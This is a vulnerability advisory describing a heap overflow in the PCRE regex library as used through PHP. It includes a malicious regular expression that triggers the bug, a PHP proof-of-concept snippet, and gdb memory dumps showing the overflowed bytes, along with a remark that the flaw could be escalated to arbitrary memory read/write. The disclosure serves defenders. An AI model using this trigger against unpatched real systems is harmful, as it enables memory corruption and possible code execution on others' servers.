I. Summary
PCRE is a regular expression C library inspired by the regular expression capabilities in the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP.
PCRE library is prone to a vulnerability which leads to Heap Overflow. During the compilation of a malformed regular expression, more data is written on the malloced block than the expected size output by compile_regex. Exploits with advanced Heap Fengshui techniques may allow an attacker to execute arbitrary code in the context of the user running the affected application.
------------------------------------------------------------------
II. Description
Latest version of PCRE is prone to a Heap Overflow vulnerability which could caused by the following regular expression.
/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/
To reproduce the problem, we could use pcretest provide by PCRE library or applications which is wrapped with PCRE such as PHP.
For pcretest, simply type the regular expression after the re>
For PHP, latest version of PHP 5.6.9 (wrapped with PCRE 8.37) could be triggered by following code snippet:
<?php
preg_match("/^(?P=B)((?P=B)(?J:(?P<B>c)(?P<B>a(?P=B)))>WGXCREDITS)/","ADLAB",$arr);
?>
First, pcre_compile2 invoke compile_regex() to calucate the size of memory that is used to save the regular expression.
re then points to the new allocated memory with the size above.
Next, pcre_compile2 invoke compile_regex() again to fill the regular expression into the allocated memory.
The problem here is that more data is written then expected.
Following test is conveyed under Kali Linux (based on Debian x64) with php 5.6.9:
==============================================================
gdb php poc.php
9217 re = (REAL_PCRE *)(PUBL(malloc))(size);
(gdb) x/10i $rip
=> 0x46f3cb <php_pcre_compile2+2187>: mov rdi,rbp
0x46f3ce <php_pcre_compile2+2190>: call QWORD PTR [rax]
(gdb) x $rbp
0x97: Cannot access memory at address 0x97
==============================================================
So the expected size of the above regular expression is 0x97 = 151.
And the base address of allocated memory is 0x1007480.
Here is the layout of 0x1007480 just before the second compile_regexp:
==============================================================
(gdb) x/160x 0x1007480
0x1007480: [0x45 0x52 0x43 0x50 0x97 0x00 0x00 0x00
0x1007488: 0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00
0x1007490: 0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff
0x1007498: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074a0: 0x00 0x00 0x40 0x00 0x04 0x00 0x02 0x00
0x10074a8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074b0: 0xd0 0x7a 0x00 0x01 0x00 0x00 0x00 0x00
0x10074b8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074c0: 0x00 0x02 0x42 0x00 0x00 0x03 0x42 0x00
0x10074c8: 0x83 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074d0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074d8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074e0: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074e8: 0x80 0x48 0xd8 0xf6 0xff 0x7f 0x00 0x00
0x10074f0: 0xff 0xff 0xff 0xff 0x00 0x00 0x00 0x00
0x10074f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1007500: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x1007508: 0x60 0x75 0x00 0x01 0x00 0x00 0x00 0x00
0x1007510: 0xff 0xff 0xff 0xff 0xff 0xff 0xff] 0xff
0x1007518: 0xa1 0x01 0x00 0x00 0x00 0x00 0x00 0x00
==============================================================
After the second compile_regexp:
==============================================================
(gdb) x/160x 0x1007480
0x1007480: [0x45 0x52 0x43 0x50 0x97 0x00 0x00 0x00
0x1007488: 0x00 0x00 0x00 0x00 0x00 0x04 0x00 0x00
0x1007490: 0xff 0xff 0xff 0xff 0xff 0xff 0xff 0xff
0x1007498: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074a0: 0x00 0x00 0x40 0x00 0x04 0x00 0x02 0x00
0x10074a8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074b0: 0xd0 0x7a 0x00 0x01 0x00 0x00 0x00 0x00
0x10074b8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0x10074c0: 0x00 0x02 0x42 0x00 0x00 0x03 0x42 0x00
0x10074c8: 0x83 0x00 0x51 0x1b 0x73 0x00 0x00 0x00
0x10074d0: 0x02 0x85 0x00 0x45 0x00 0x01 0x73 0x00
0x10074d8: 0x00 0x00 0x02 0x83 0x00 0x22 0x85 0x00
0x10074e0: 0x07 0x00 0x02 0x1d 0x63 0x78 0x00 0x07
0x10074e8: 0x81 0x00 0x12 0x85 0x00 0x0c 0x00 0x03
0x10074f0: 0x1d 0x61 0x73 0x00 0x00 0x00 0x02 0x78
0x10074f8: 0x00 0x0c 0x78 0x00 0x12 0x78 0x00 0x22
0x1007500: 0x1d 0x3e 0x1d 0x57 0x1d 0x47 0x1d 0x58
0x1007508: 0x1d 0x43 0x1d 0x52 0x1d 0x45 0x1d 0x44
0x1007510: 0x1d 0x49 0x1d 0x54 0x1d 0x53 0x78] *0x00
0x1007518: *0x45 *0x78 *0x00 *0x51 0x00 0x00 0x00 0x00
==============================================================
Obviously, 5 more bytes is written on the heap in this case.
This overflow can be used to modify adjacent length field of array/vector/string, gaining the attacker the ability to read/write the whole memory
in the context of the affected application (The same trick as CVE-2013-0634).
------------------------------------------------------------------
III. Impact
Heap Overflow
------------------------------------------------------------------
IV. Affected
PCRE version > 8.33 (8.34, 8.35, 8.36, 8.37 are confirmed to be vulnerable).
PCRE2 10.10 is also confirmed to be vulnerable.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.